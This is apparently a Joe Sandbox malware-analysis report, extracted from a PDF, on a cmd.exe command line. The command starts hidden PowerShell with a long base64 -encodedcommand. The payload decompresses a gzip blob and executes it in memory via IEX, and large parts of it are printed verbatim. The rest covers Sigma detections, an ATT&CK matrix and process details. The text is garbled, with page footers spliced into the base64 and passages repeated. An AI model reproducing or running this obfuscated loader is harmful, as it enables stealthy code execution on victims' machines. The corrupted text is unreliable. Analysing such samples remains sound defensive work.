NAA4AGUAZABTAHQAcABjADUAVgBDAGUAUgBkAGcARgBkAEEAQwBlAE4ASABaADkASQBjADYAcABvAFYAOQBPAGcASwA4AEUAdQAvAGcAYQBiAG4ATABwAFEA WgB6AGEAUQBQAHAAUgBWAG4AdAA2AHQAdgB4AGUAVwA2AGoANABYAEkAbwAwAEUASQBkAFUANwB5AHkASwBiAFkAcAAwADQAZQBWAFEAUABoAE gAWQA2AHEAbwBXAFQASgBVAHYAdgB1AGIAaQAvADAAcABVAGUAdwBrAEoAbQA1AGkAZgBFAEMAcABJAGUAcgA2AHkAeQBBAGkAZwBrAEoAWgBCAGQAZwBHAE 4AcAByAFMAagB6AHMASwAxAFQAeQB5AFAAUQBjAFcAbwB0AHQAYgA1ADYANQBvAEwAMgBJAFMAUgAzADcAUABwAFEAYwBXAEkAbwBnAEoANwBDAGoAcwBMAE MAbAA0AGcAeAAzADgAbgAvAG4AaAAxAEcAMABxAGIAUgBXAGEANQArAHUAUQBEAHIAcABRAGkAMABmAHoANgBIAG4ASABDAG8AcQBvAFIAdQBlAFUAMABmAD

cAQgA3AGUAegBPAGsAbQBMAFEAbQBHAFYAZwBYAFQAaQBOAEIARABBADkAcABuAE0AbwAwAGUAUABTACsAaAByAFcAdgA0AG4ANAB2ADAAMwA5 ADMANQBzAE0AVAArADQAVwBlAGYAMABrAEUAZwA5AEsAYwBSAHgATABaAGEAcQBYAEIASgBKAG8AbwBiAEwANwBSAEgATABCAEQAawB1AEEAYgBVAFcAWgA2 AHMAYQBGAHYAVAA2AHkAawA3AGEAbQBLADYAVgBiADgASwBOAEYAZgBlAFcASAA2ADkANQB1AHgAbQAxAHoASQAzAFoASABNAEkAdgBnAGwAOQA1ADAAMgBw ADIAdQA1ADMANwBkAGUAMgArAFMANQByAGgAMwBjAEEAcwBkAFYAegByADQAMAAzAGoASwB0AHkARwBWAGoAaQBzAGwAYwBxAHQARQBzAGoAdA BOACsAMgBtAGEAMABWADMANwBOAE4ARgB1AEwAcQA2AGMATgBaAFcAMQBJAGMAOQA4AFcANQBqAGkAbwBZAFYATgBhAHIAbQA1AFkAYQAxAHIA dQBkAGUANQBXAEEAbgAxAGYAOAA0ADIAMQA3AE0AUgBsAGIAcgAzAGEAegBkAHUAagBJAGYAUgBVAHYASgBtADEAWgBVAGEAMgAzAHEARgBRAGIAcgB0ADEA WgBVAFoAeAAzAFEAdQA3AGwAZQBCADcAVwB0AGMAMABXAGIAbgBXAHMANgA2AHAASgB0AFcAZAA1AFEAUABOAC8ARgBmAHoAeQArAGEAWQBiAD kAegBxAGUAUwBXAFAAWQBnAEIAcgB1AHkASgA1ADEANgB2ADIATwBWADUATAB0AEYAdQBkAEUAdQBEAHoANwB2AFkAeQBhAFcAVgB0AHoALwByAFIAbQB1AF kALwBJAHMAbABzADgAeABXAGQAcgB4ADMAYgBBAFQAZwA5AHoAegBzADIALwBiAHQAWgAxADkAKwBYAG4ANABkAHUAQwBTAFMAbgBEAEgAKwBsAHUAbgBZAD UAVgBiADMAWABwAHAAUgA3AGYATwAvAG4ASQBkADkAawBmAEQAaAArAGUAbABiAFkAUAA4AE4AVwArAHgAdQA0AGQAZwBJADkAcgB6AEsAegB0AGsAbwB5AD IASgBZAFAALwBDAHQAcAAyAGQAQQA0AEARgBvAC8AaABUAGUAWQBDAFoAcwB5AFgANwBaAEQALwB1AE4AZQBEAHUAMAB6AFAAQQBoADUAUQAzA DcAUgBzAFQANABnAHAAcQBjAFoAZAB2AFAAQQBLAFkARQA3AE0AWABkAHgAZgB4AHcARQA1AHMATwBzADEAbwBlAGUAbQArAGMAOABIAC8AawB2ADMAbQA2A Copyright null 2020 Page 5 of 18 DcAUgBzAFQANABnAHAAcQBjAFoAZAB2AFAAQQBLAFkARQA3AE0AWABkAHgAZgB4AHcARQA1AHMATwBzADEAbwBlAGUAbQArAGMAOABIAC8AawB2ADMAbQA2A FcASgB0AG0AcQBTAHkAQQBmAG4AcgBSAFYAUwBMAEIAYgA3AHkAeQBiAE4AZAB1AFgAdQBhAGoAMABhAGsASQBuAGQAbQBiAFQALwBvAGsAdgA2AGUAbABNA DMASwAyADgAYQBvAE0AcgBUADkAZgB0AHUAOQBxAEkAMAArACsAcwA3AFQAZwA3AG0AcgBOAFIAZQBPAGEAZQAyAGIASQArAGQAUgAzAEMAcABXAHUAWQB6A EQAbgBOAGkAcAAzAHYAcwA3AGcAdgA4AEYAWAA2AEkAagBiADQAQQB0AFEARQBTADEALwArAGEATgBvAGYAcgAzADgAVwBSADgAdgBwAHQAawA4AC8AYgA0A FgAWgBqAHQAdwBGAHIANQBOADgAWABCADUAQwBUAEMASgA4AHgANwBiAFkAagAxAE0AQgBjAEwANwBBAE0AagBZAFIAQgBsAGIAYQBUAEYAZQB PAHMAdwBUAGcAYgBNAFUAeABxADYALwB2AEkATAA2AEoAbgB5AGcAUAByAHcATwBvAEQAMwBRADEAWgA4AFYAZAA5AG4AUgBBADMAQQBWAHkAW QBSAGoATwBOADAAUwBFADYAZwB5AFQAegBBAHMAbgB6ADUANABzAHAAQQBSADAARwBZAGUAbQBsAE0AcwA5AEIAMQBrAHkARgB4AGkARABDAGI AbABaAG4AZwArAC8AZQBmAEkAYgB6ADgAQwBZAGgAZABHAHMAegBsAEkAbwA5AEsAdQAzAEsAcABWAEYATAAvAHIAMABwAEcANwB0AGQAaABxAGIATgAxAHI AQgAvAE4ANQBkAFcAUQBQAFAASABrADkAQwBZAC8AdQBjAGsANABvAE0ALwBEAFkARQBYAC8AeAB3AFQAOABjAE8AbQAvAFEANgB2AEEAUwArAGIAcwBFAGI AcgBFAG8AWgBmAHgATQBuAEwAYQBoADEAegBPAGMAdABIAEoAdgB2AEQAMgA4AEkAcQBrAEcAMwBTAFQAYwBFADkASQB6AEcAVgBoAHkAVwBiAHcANQBFAHg ANgBxAEgANgBPAEQAVwBRADEAUgArAGcAYwBvADIAKwBvAEEATwBGAFYAUgBmAGsAUwAzAHAAMQA4AEgAcQBxAEcAaQB0AEoAbgA5AEYAZQAwAHgAVgA2AHE AKwBCAFgAZABVADAATABoAEcAVgBUAG8AcwBCAG0AdwBsAE0ASgBjAFYASwBZAFQASQAwAG8AWQA5AHYANABDAFAAYQAvAEEAaQBaAGMATABBA EEAQQA9ACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiA GoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzA HMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZAB UAG8ARQBuAGQAKAApADsA MD5: DBA3E6449E97D4E3DF64527EF7012A10) cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines

Sigma detected: Suspicious Encoded PowerShell Command Line

Signature Overview

• Spreading • E-Banking Fraud • System Summary • Data Obfuscation • Hooking and other Techniques for Hiding and Protection • Malware Analysis System Evasion • Anti Debugging • HIPS / PFW / Operating System Protection Evasion • Language, Device and Operating System Detection

Click to jump to signature section

E-Banking Fraud:

Malicious encrypted Powershell command line found

System Summary:

Data Obfuscation:

Suspicious powershell command line found

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found

Mitre Att&ck Matrix

Initial Privilege Credential Lateral Command Network Access Execution Persistence Escalation Defense Evasion Access Discovery Movement Collection Exfiltration and Control Effects Valid Command and Path Process Masquerading 1 OS Security Software Remote Data from Exfiltration Data Eavesdrop on Accounts Scripting Interception Injection 1 1 Credential Discovery 1 Services Local Over Other Obfuscation Insecure Interpreter 1 1 Dumping System Network Network Medium Communication Default PowerShell 3 Boot or Boot or Logon Virtualization/Sandbox LSASS Virtualization/Sandbox Remote Data from Exfiltration Junk Data Exploit SS7 to Accounts Logon Initialization Evasion 3 Memory Evasion 3 Desktop Removable Over Redirect Phone Initialization Scripts Protocol Media Bluetooth Calls/SMS Scripts Domain At (Linux) Logon Script Logon Script Process Security Process Discovery 1 SMB/Windows Data from Automated Steganography Exploit SS7 to Accounts (Windows) (Windows) Injection 1 1 Account Admin Shares Network Exfiltration Track Device Manager Shared Location Drive Local At (Windows) Logon Script Logon Script Deobfuscate/Decode NTDS File and Directory Distributed Input Scheduled Protocol SIM Card Accounts (Mac) (Mac) Files or Information 1 Discovery 2 Component Capture Transfer Impersonation Swap Object Model Cloud Cron Network Network Software Packing LSA System Information SSH Keylogging Data Fallback Manipulate Accounts Logon Script Logon Script Secrets Discovery 1 1 Transfer Channels Device Size Limits Communication

Behavior Graph

Copyright null 2020 Page 7 of 18 Hide Legend Behavior Graph Legend: ID: 278521 Process Cookbook: defaultwindowscmdlinecookbook.jbs Startdate: 27/08/2020 Signature Architecture: WINDOWS Created File Score: 68 DNS/IP Info Is Dropped

Malicious encrypted Suspicious powershell Very long command line Powershell command line 3 other signatures started Is Windows Process command line found found found Number of created Registry Values

Number of created Files

cmd.exe Visual Basic

Delphi

1 Java

.Net C# or VB.NET

Malicious encrypted C, C++ or other language Very long command line Powershell command line started started found found Is malicious

Internet

cmd.exe conhost.exe

Malicious encrypted Suspicious powershell Very long command line Encrypted powershell Powershell command line started command line found found cmdline option found found

powershell.exe

Screenshots

Thumbnails This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version: 29.0.0 Ocean Jasper Analysis ID: 278521 Start date: 27.08.2020 Start time: 09:26:59 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 1m 48s Hypervisor based Inspection enabled: false Report type: light Cookbook file name: defaultwindowscmdlinecookbook.jbs Analysis system description: w10x64 Windows 10 64 bit v1803 with Office Professional Plus 2016, IE 11, Adobe Reader DC 19, Java 8 Update 211 Number of analysed new started processes analysed: 4 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies: EGA enabled HDC enabled AMSI enabled Analysis Mode: default Analysis stop reason: Timeout Detection: MAL Classification: mal68.bank.evad.win@6/2@0/0 Cookbook Comments: Adjust boot time Enable AMSI Stop behavior analysis, all processes terminated

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: data Size (bytes): 788 Entropy (8bit): 5.086430865224559 Encrypted: false MD5: 11DD62925A1DDFD437C0617DCF810BF7 SHA1: E22E5D3D7C4CC2F435432D97BAC2F69099EDAFDD SHA-256: 420B772FBD48AE14EFE410FB7C7A10E4BB0B2AA04D93625FFC6704AEA5422F04 SHA-512: 784CDDEA6E651B25AF83E499AD03248FF251F7CCD7FAA2F0C9DB6F7A62D7071C2A6A640E2544FDE64A5C06D48B062B9CDD9D5ABEC1229ECE36BF27F898EC0 6D3 Malicious: false Reputation: low Preview: @...e...... H...... <@.^.L."My...:...... Microsoft.PowerShell.ConsoleHostD...... fZve...F.....x.)...... System.Management.Automati on4...... [...{a.C..%6..h...... System.Core.0...... G-.o...A...4B...... System..4...... Zg5..:O..g..q...... System.Xml..L...... 7.....J@...... ~...... #.Microso ft.Management.Infrastructure.8...... '....L..}...... System.Numerics.@...... Lo...QN......

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7QMKPL9LWVYZ4Y4HXHFV.temp Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: data Size (bytes): 6205 Entropy (8bit): 3.7602921069456774 Encrypted: false MD5: 06AFE9AC5C20E23112373B406D837F7B SHA1: F74C029750CE64489C651EED0C4BB2C550F5C6A3 SHA-256: 60DEF60525625E93E69D0133F0B1141A36FEFEB3B47033096CA377F3112EF5A9 SHA-512: C92380AFF3CD0018B31B414C8999502688115807293B57878B1BAA6732D056D119B81F792DBEA892BDA660A19C8D53FF7C9ACC93EE6BC3B8090B9C702DA71F0A Malicious: false Reputation: low Preview: ...... FL...... F.".. ...N....-..;yz(.a..\...... :..DG..Yr?.D..U..k0.&...&...... -..>.u..{...... |...... t...CFSF..1...... Nz...AppData...t.Y^...H.g.3..( .....gVA.G..k...@...... Ny..Qo...... Y...... f.(.A.p.p.D.a.t.a...B.V.1...... Nz...Roaming.@...... Ny..Qo...... Y...... D1,.R.o.a.m.i.n.g.....\.1...... P9...MICROS~1..D...... Ny..Qo...... Y...... [t.M.i.c.r.o.s.o.f.t.....V.1...... Q.v..Windows.@...... Ny..Qp...... Y...... m.W.i.n.d.o.w.s...... 1...... N{...STARTM~1..n...... Ny..Q.v.....Y...... D...... 0.S.t.a.r.t. [email protected].,.-.2.1.7.8.6...... 1...... P.q..Programs..j...... Ny..Q.v.....Y...... @...... [email protected].,.-.2.1. 7.8.2.....n.1...... L...WINDOW~1..V...... Ny..Qzq.....Y...... T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2...... L.. .WINDOW~1.LNK..^...... Ny..P...... Y......

Static File Info

No static file info

Network Behavior

No network behavior found

Statistics

Behavior

• cmd.exe • conhost.exe • cmd.exe • powershell.exe

Click to jump to process

System Behavior

Analysis Process: cmd.exe PID: 6648 Parent PID: 4912

General

Start time: 09:27:43 Start date: 27/08/2020 Path: C:\Windows\SysWOW64\cmd.exe Wow64 process (32bit): true Commandline: cmd /C 'C:\Windows\system32\cmd.exe /b /c start /b /min powershell -nop -w hidden -encoded command JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBt AG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoA RgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBB AEEAQQBBAEEAQQBBAEEAQQBLADEAVwBiAFgAUABhAE8AQgBEACsASABIADYA RgBQAG0AVABHADkAaABRAG8AQwBiAGsAMAA5AEMAWQB6ADUAZAAzAG0AZwBO AEMAWQBKAEwAUwBVAFkAWQBRAHMAZwA0AG0AeABRAEoASQBOADUAdAByAC8A ZgBpAHMAYgBVADMAcABOADcAagBwAHoAbAB4AGsAbQBzAHIAUwA3ADIAbgAz ADIAMgBWADMAWgBWAEIAWgBzAHkAVAAwAGkAZQA4AHkAaABxAFAAQgBJAHUA ZgBCAFkAZwBDADUAegB1AGYATQBHAHMAeQBTADYAUgBSACsAMABuAEIAcwBH AFIASwBwAHQAdABaAGoATwBxAFoAeQB1AE8AUwBOAFQANwBEAGkAYwBDAG8A SAArAHoASgAwAE4ATQBNAGMAcgBwAEoAOQBIAG0ARQA5AFgAegBBAGwAOQBt AGsAZgBKAGgAeABLAGsAVABzAGkAcABjAFgAYQBXAE8AMAB1ADIAdwBrAEIA ZwBsADAANABEAEwATAAyAEkAVABsAGQAVQBMAHAAZwBqADQAQwBKADkAWABG ADIAdgBHADIAeQBGAHYAVwBEAHkALwBuADAAOQA1AEoAdwBHAE0AdgAwAHUA dABxAG0AcwBDAGsARgBYAE0AOQArAGoAUQBqAGYAUQBWAC8AUwAwAG8ASgB3 AFcANwBtAFoATABTAGkAVAA2AEUANQAxAFAAaQAyADIAZgB6AGIAQgAvAEUA SQB2AHIAbQBDAHcAZwBvAEcAcgBnAHEATABNAHUASQAxAGgARgBVAEwAVABY AHYAaQBkADEANwBjAHMAWAB6AFIAZwBYAEwAaQBiAEYANQBpAGIARQB2AHQA QQAxAE8AeABhAFMAcgBvAHEATwA3ADIAcwBHACsAbQBhAG8AQwA0AGYAeABt AHUAcABhAHoAeQBPAGMAQwBlAGIASwA0AHAATQBYAGwAQwArAEwARAA0AG4A MwAvAGMAVAA1AFgAdQBxADcAWgBoAHcAaQBtADYAOAB4AHgAUABGADYAawBN AHAAcQBxAHEATgByAHMAQgB3AEEATgB0AFUAVQBRAHkAMgBQAHgAdQBxACsA OABXAFMAQwBQAGgAeQA5AHUAUQA4AEQANgBhADEAbwAwAFEAbwBrADUAVwB4 AHQAVQB4ADUANQBoAEkAcQBpAGkAUQBQAEgAcAAvAGYAVQBCAFQAVgBOAFEA UABxAEMAdQBXAGEAQQBFADUAegBLAGsAQQBjAG8AOAB3AFgAMABJAHYAWgBN ADkAZgBNAGcAOQBQADAAOAAyAEIAMwAvAHEAdAAyAEoAMwBxAGYAYgBEAE4A eABmAFYAZABKAFAAbABVAEIAcQBJAEwAbQBSAFAAMwBEAGkAVgArAEQAbwBK AGIAeABKAHoAVQBFADQAUAAzAGwALwBRAGkANABEAC8AbgA0AGkAbQBKAEgA NwBsAG4AdQBCAHEAZwA3ADEANgBSAHgATABPAHAAVwBBADcAdwBsAFgAYwAy Copyright null 2020 AGQAbgA0ADIAUgBKAEkAUgA1ADkAdwBJAFMAWAA2AE4AMgBpAFUAaAAP3aAgDeE A12 of 18 AGQAbgA0ADIAUgBKAEkAUgA1ADkAdwBJAFMAWAA2AE4AMgBpAFUAaAA3ADEA dwBBAGsAcwBHAFkAOQBWAE8AbwBjADgAcABNAGIAawBlADMANwBTAGEAegBO AE4AawBYAC8AVgAwAEUAVwBtAGQAZABCAEoAMAA1AFAANgBjAFkAdgBHAGoA OAB4AHoASgByAGsAegBJADMAZABnAGoAOQBxAGYAegBrAEwAUABkAHkAaABY ADUANgA5AFgAUQA0AE8ANgBYAGsAQQBiAGMAWQBCAFgASABzAGsASQByADcA KwBVAE0AKwByADYATgBNAEcAagBtAEkAbgAxAHcAVQA5AGQATwB4AHgAUQBw ADMARgBBAFIAMQBPAEEAagBuADkAVwBhADYANAA4AGUAZABTAHQAcABjADUA VgBDAGUAUgBkAGcARgBkAEEAQwBlAE4ASABaADkASQBjADYAcABvAFYAOQBP AGcASwA4AEUAdQAvAGcAYQBiAG4ATABwAFEAWgB6AGEAUQBQAHAAUgBWAG4A dAA2AHQAdgB4AGUAVwA2AGoANABYAEkAbwAwAEUASQBkAFUANwB5AHkASwBi AFkAcAAwADQAZQBWAFEAUABoAEgAWQA2AHEAbwBXAFQASgBVAHYAdgB1AGIA aQAvADAAcABVAGUAdwBrAEoAbQA1AGkAZgBFAEMAcABJAGUAcgA2AHkAeQBB AGkAZwBrAEoAWgBCAGQAZwBHAE4AcAByAFMAagB6AHMASwAxAFQAeQB5AFAA UQBjAFcAbwB0AHQAYgA1ADYANQBvAEwAMgBJAFMAUgAzADcAUABwAFEAYwBX AEkAbwBnAEoANwBDAGoAcwBMAEMAbAA0AGcAeAAzADgAbgAvAG4AaAAxAEcA MABxAGIAUgBXAGEANQArAHUAUQBEAHIAcABRAGkAMABmAHoANgBIAG4ASABD AG8AcQBvAFIAdQBlAFUAMABmADcAQgA3AGUAegBPAGsAbQBMAFEAbQBHAFYA ZwBYAFQAaQBOAEIARABBADkAcABuAE0AbwAwAGUAUABTACsAaAByAFcAdgA0 AG4ANAB2ADAAMwA5ADMANQBzAE0AVAArADQAVwBlAGYAMABrAEUAZwA5AEsA YwBSAHgATABaAGEAcQBYAEIASgBKAG8AbwBiAEwANwBSAEgATABCAEQAawB1 AEEAYgBVAFcAWgA2AHMAYQBGAHYAVAA2AHkAawA3AGEAbQBLADYAVgBiADgA SwBOAEYAZgBlAFcASAA2ADkANQB1AHgAbQAxAHoASQAzAFoASABNAEkAdgBn AGwAOQA1ADAAMgBwADIAdQA1ADMANwBkAGUAMgArAFMANQByAGgAMwBjAEEA cwBkAFYAegByADQAMAAzAGoASwB0AHkARwBWAGoAaQBzAGwAYwBxAHQARQBz AGoAdABOACsAMgBtAGEAMABWADMANwBOAE4ARgB1AEwAcQA2AGMATgBaAFcA MQBJAGMAOQA4AFcANQBqAGkAbwBZAFYATgBhAHIAbQA1AFkAYQAxAHIAdQBk AGUANQBXAEEAbgAxAGYAOAA0ADIAMQA3AE0AUgBsAGIAcgAzAGEAegBkAHUA agBJAGYAUgBVAHYASgBtADEAWgBVAGEAMgAzAHEARgBRAGIAcgB0ADEAWgBV AFoAeAAzAFEAdQA3AGwAZQBCADcAVwB0AGMAMABXAGIAbgBXAHMANgA2AHAA SgB0AFcAZAA1AFEAUABOAC8ARgBmAHoAeQArAGEAWQBiADkAegBxAGUAUwBX AFAAWQBnAEIAcgB1AHkASgA1ADEANgB2ADIATwBWADUATAB0AEYAdQBkAEUA dQBEAHoANwB2AFkAeQBhAFcAVgB0AHoALwByAFIAbQB1AFkALwBJAHMAbABz ADgAeABXAGQAcgB4ADMAYgBBAFQAZwA5AHoAegBzADIALwBiAHQAWgAxADkA KwBYAG4ANABkAHUAQwBTAFMAbgBEAEgAKwBsAHUAbgBZADUAVgBiADMAWABw AHAAUgA3AGYATwAvAG4ASQBkADkAawBmAEQAaAArAGUAbABiAFkAUAA4AE4A VwArAHgAdQA0AGQAZwBJADkAcgB6AEsAegB0AGsAbwB5ADIASgBZAFAALwBD AHQAcAAyAGQAQQA0AEARgBvAC8AaABUAGUAWQBDAFoAcwB5AFgANwBaAEQAL wB1AE4AZQBEAHUAMAB6AFAAQQBoADUAUQAzADcAUgBzAFQANABnAHAAcQBjA FoAZAB2AFAAQQBLAFkARQA3AE0AWABkAHgAZgB4AHcARQA1AHMATwBzADEAb wBlAGUAbQArAGMAOABIAC8AawB2ADMAbQA2AFcASgB0AG0AcQBTAHkAQQBmA G4AcgBSAFYAUwBMAEIAYgA3AHkAeQBiAE4AZAB1AFgAdQBhAGoAMABhAGsAS QBuAGQAbQBiAFQALwBvAGsAdgA2AGUAbABNADMASwAyADgAYQBvAE0AcgBUA DkAZgB0AHUAOQBxAEkAMAArACsAcwA3AFQAZwA3AG0AcgBOAFIAZQBPAGEAZ QAyAGIASQArAGQAUgAzAEMAcABXAHUAWQB6AEQAbgBOAGkAcAAzAHYAcwA3A GcAdgA4AEYAWAA2AEkAagBiADQAQQB0AFEARQBTADEALwArAGEATgBvAGYAc gAzADgAVwBSADgAdgBwAHQAawA4AC8AYgA0AFgAWgBqAHQAdwBGAHIANQBOA DgAWABCADUAQwBUAEMASgA4AHgANwBiAFkAagAxAE0AQgBjAEwANwBBAE0Aa gBZAFIAQgBsAGIAYQBUAEYAZQBPAHMAdwBUAGcAYgBNAFUAeABxADYALwB2A EkATAA2AEoAbgB5AGcAUAByAHcATwBvAEQAMwBRADEAWgA4AFYAZAA5AG4AU gBBADMAQQBWAHkAWQBSAGoATwBOADAAUwBFADYAZwB5AFQAegBBAHMAbgB6A DUANABzAHAAQQBSADAARwBZAGUAbQBsAE0AcwA5AEIAMQBrAHkARgB4AGkAR ABDAGIAbABaAG4AZwArAC8AZQBmAEkAYgB6ADgAQwBZAGgAZABHAHMAegBsA EkAbwA5AEsAdQAzAEsAcABWAEYATAAvAHIAMABwAEcANwB0AGQAaABxAGIAT gAxAHIAQgAvAE4ANQBkAFcAUQBQAFAASABrADkAQwBZAC8AdQBjAGsANABvA E0ALwBEAFkARQBYAC8AeAB3AFQAOABjAE8AbQAvAFEANgB2AEEAUwArAGIAc wBFAGIAcgBFAG8AWgBmAHgATQBuAEwAYQBoADEAegBPAGMAdABIAEoAdgB2A EQAMgA4AEkAcQBrAEcAMwBTAFQAYwBFADkASQB6AEcAVgBoAHkAVwBiAHcAN QBFAHgANgBxAEgANgBPAEQAVwBRADEAUgArAGcAYwBvADIAKwBvAEEATwBGA FYAUgBmAGsAUwAzAHAAMQA4AEgAcQBxAEcAaQB0AEoAbgA5AEYAZQAwAHgAV gA2AHEAKwBCAFgAZABVADAATABoAEcAVgBUAG8AcwBCAG0AdwBsAE0ASgBjA FYASwBZAFQASQAwAG8AWQA5AHYANABDAFAAYQAvAEEAaQBaAGMATABBAEEAQ QA9ACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJA E8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZ QBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwA FMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAa QBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEA GUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAK AApADsA' Imagebase: 0x810000 File size: 232960 bytes MD5 hash: F3BDBE3BB6F734E357235F4D5898582D Has administrator privileges: false Programmed in: C, C++ or other language Reputation: high

File Activities

Source File Path Access Attributes Options Completion Count Address Symbol

Analysis Process: conhost.exe PID: 6660 Parent PID: 6648

Start time: 09:27:44 Start date: 27/08/2020 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7bc490000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has administrator privileges: false Programmed in: C, C++ or other language Reputation: high

Analysis Process: cmd.exe PID: 6712 Parent PID: 6648

General

Start time: 09:27:45 Start date: 27/08/2020 Path: C:\Windows\SysWOW64\cmd.exe Wow64 process (32bit): true Commandline: C:\Windows\system32\cmd.exe /b /c start /b /min powershell -nop -w hidden -enco dedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZ QBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6A DoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMAS QBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBiAFgAUABhAE8AQgBEACsASABIA DYARgBQAG0AVABHADkAaABRAG8AQwBiAGsAMAA5AEMAWQB6ADUAZAAzAG0AZ wBOAEMAWQBKAEwAUwBVAFkAWQBRAHMAZwA0AG0AeABRAEoASQBOADUAdAByA C8AZgBpAHMAYgBVADMAcABOADcAagBwAHoAbAB4AGsAbQBzAHIAUwA3ADIAb gAzADIAMgBWADMAWgBWAEIAWgBzAHkAVAAwAGkAZQA4AHkAaABxAFAAQgBJA HUAZgBCAFkAZwBDADUAegB1AGYATQBHAHMAeQBTADYAUgBSACsAMABuAEIAc wBHAFIASwBwAHQAdABaAGoATwBxAFoAeQB1AE8AUwBOAFQANwBEAGkAYwBDA G8ASAArAHoASgAwAE4ATQBNAGMAcgBwAEoAOQBIAG0ARQA5AFgAegBBAGwAO QBtAGsAZgBKAGgAeABLAGsAVABzAGkAcABjAFgAYQBXAE8AMAB1ADIAdwBrA EIAZwBsADAANABEAEwATAAyAEkAVABsAGQAVQBMAHAAZwBqADQAQwBKADkAW ABGADIAdgBHADIAeQBGAHYAVwBEAHkALwBuADAAOQA1AEoAdwBHAE0AdgAwA HUAdABxAG0AcwBDAGsARgBYAE0AOQArAGoAUQBqAGYAUQBWAC8AUwAwAG8AS gB3AFcANwBtAFoATABTAGkAVAA2AEUANQAxAFAAaQAyADIAZgB6AGIAQgAvA EUASQB2AHIAbQBDAHcAZwBvAEcAcgBnAHEATABNAHUASQAxAGgARgBVAEwAV ABYAHYAaQBkADEANwBjAHMAWAB6AFIAZwBYAEwAaQBiAEYANQBpAGIARQB2A HQAQQAxAE8AeABhAFMAcgBvAHEATwA3ADIAcwBHACsAbQBhAG8AQwA0AGYAe ABtAHUAcABhAHoAeQBPAGMAQwBlAGIASwA0AHAATQBYAGwAQwArAEwARAA0A G4AMwAvAGMAVAA1AFgAdQBxADcAWgBoAHcAaQBtADYAOAB4AHgAUABGADYAa wBNAHAAcQBxAHEATgByAHMAQgB3AEEATgB0AFUAVQBRAHkAMgBQAHgAdQBxA CsAOABXAFMAQwBQAGgAeQA5AHUAUQA4AEQANgBhADEAbwAwAFEAbwBrADUAV wB4AHQAVQB4ADUANQBoAEkAcQBpAGkAUQBQAEgAcAAvAGYAVQBCAFQAVgBOA FEAUABxAEMAdQBXAGEAQQBFADUAegBLAGsAQQBjAG8AOAB3AFgAMABJAHYAW gBNADkAZgBNAGcAOQBQADAAOAAyAEIAMwAvAHEAdAAyAEoAMwBxAGYAYgBEA E4AeABmAFYAZABKAFAAbABVAEIAcQBJAEwAbQBSAFAAMwBEAGkAVgArAEQAb wBKAGIAeABKAHoAVQBFADQAUAAzAGwALwBRAGkANABEAC8AbgA0AGkAbQBKA EgANwBsAG4AdQBCAHEAZwA3ADEANgBSAHgATABPAHAAVwBBADcAdwBsAFgAY wAyAGQAbgA0ADIAUgBKAEkAUgA1ADkAdwBJAFMAWAA2AE4AMgBpAFUAaAA3A DEAdwBBAGsAcwBHAFkAOQBWAE8AbwBjADgAcABNAGIAawBlADMANwBTAGEAe gBOAE4AawBYAC8AVgAwAEUAVwBtAGQAZABCAEoAMAA1AFAANgBjAFkAdgBHA GoAOAB4AHoASgByAGsAegBJADMAZABnAGoAOQBxAGYAegBrAEwAUABkAHkAa ABYADUANgA5AFgAUQA0AE8ANgBYAGsAQQBiAGMAWQBCAFgASABzAGsASQByA DcAKwBVAE0AKwByADYATgBNAEcAagBtAEkAbgAxAHcAVQA5AGQATwB4AHgAU 